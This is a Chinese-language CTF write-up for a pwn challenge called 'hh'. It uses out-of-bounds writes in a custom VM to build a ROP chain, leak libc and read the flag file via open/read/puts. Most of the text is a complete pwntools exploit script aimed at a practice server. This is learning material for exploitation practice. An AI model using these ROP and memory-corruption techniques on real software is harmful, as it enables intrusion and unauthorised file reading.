pwn-hh
在ida中查看,先输入somethings然后去exec_code。
看到使用了prctl,使用seccomp-tools查看,屏蔽了execve,可以构造ORW
kali@kali:~/ctf/pwn/ti/hh$ seccomp-tools dump ./hh
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
exec_code,自定义的虚拟机,9的话是push, 0xa b 可以越界读 0xc d可以越界写。
使用push和越界写,构造rop,先泄露libc,再构造orw。
exp:
#encoding=utf-8
#自定义虚拟机
from pwn import *
context(os='linux',arch='amd64')
#context.log_level = 'debug'
path='/home/kali/ctf/pwn/ti/hh/'
#r = process(path+'hh')
#r = process([path+"ld-2.23.so",path+'hh'],env={"LD_PRELOAD":path+'libc.so.6'})
r = remote('node3.buuoj.cn',25897)
elf = ELF(path+'hh')
libc = ELF(path+'libc.so.6')
poprdi_addr = 0x4011A3
#poprsi_addr = 0x4011A1
main_addr = 0x401084
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
def addrop(val):
global idx,payload
payload+=p32(vpush)+p32(val&0xffffffff)+p32(vstore)+p32(idx)
idx+=1
payload+=p32(vpush)+p32((val>>32)&0xffffffff)+p32(vstore)+p32(idx)
idx+=1
vpush = 0x9
vstore = 0xd
#puts put_addr
payload=b''
idx=(0x1F50+0x8)//4
addrop(poprdi_addr)
addrop(puts_got)
addrop(puts_plt)
addrop(main_addr)
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')
#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
puts_addr=u64(r.recvline().rstrip().ljust(8,b'\x00'))
print("puts_addr:"+hex(puts_addr))
base_addr= puts_addr - libc.symbols['puts']
print("base_addr:"+hex(base_addr))
open_addr=base_addr+ libc.symbols['open']
read_addr=base_addr+ libc.symbols['read']
write_addr=base_addr+ libc.symbols['write']
poprdx_addr = base_addr + 0x0000000000001b92
pushrax_addr = base_addr + 0x0000000000010f40
poprsi_addr = base_addr + 0x00000000000202f8
# open("flag", 0);
# read(3, buf, 64);
# write(1, buf, 64);
# puts(buf)
buf_addr = 0x602060
payload=b''
idx=(0x1F50+0x8)//4
flag_addr_off = 480
rbuf_addr = buf_addr+flag_addr_off+4
#read('flag', 0?2)
addrop(poprdi_addr)
addrop(buf_addr+flag_addr_off+4)
addrop(poprsi_addr)
addrop(0x0)
addrop(open_addr)
#read(3, buf, 64)
addrop(poprdi_addr)
addrop(3)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(read_addr)
'''
#write(1, buf, 64) p64(poprdi_addr)+ p64(2)+p64(poprsi_addr)+ p64(bss())+p64(poprdx_addr)+ p64(10)+p64(read_addr)
addrop(poprdi_addr)
addrop(1)
addrop(poprsi_addr)
addrop(rbuf_addr)
addrop(poprdx_addr)
addrop(64)
addrop(write_addr)
'''
##puts:(buf) p64(poprdi_addr)+ p64(buff_addr)+p64(put_addr)
addrop(poprdi_addr)
addrop(rbuf_addr)
addrop(puts_plt)
print('flag_addr_off:'+str(len(payload)))
payload+=p32(16)+p32(0x67616c66)+p32(0) #flag数据,地址可以计算,在前面填入
#gdb.attach(r, 'b *0x4011A3')
r.sendlineafter('Give me you choice :\n', '1')
r.sendlineafter('code:', payload)
r.sendlineafter('Give me you choice :\n', '2')
r.interactive()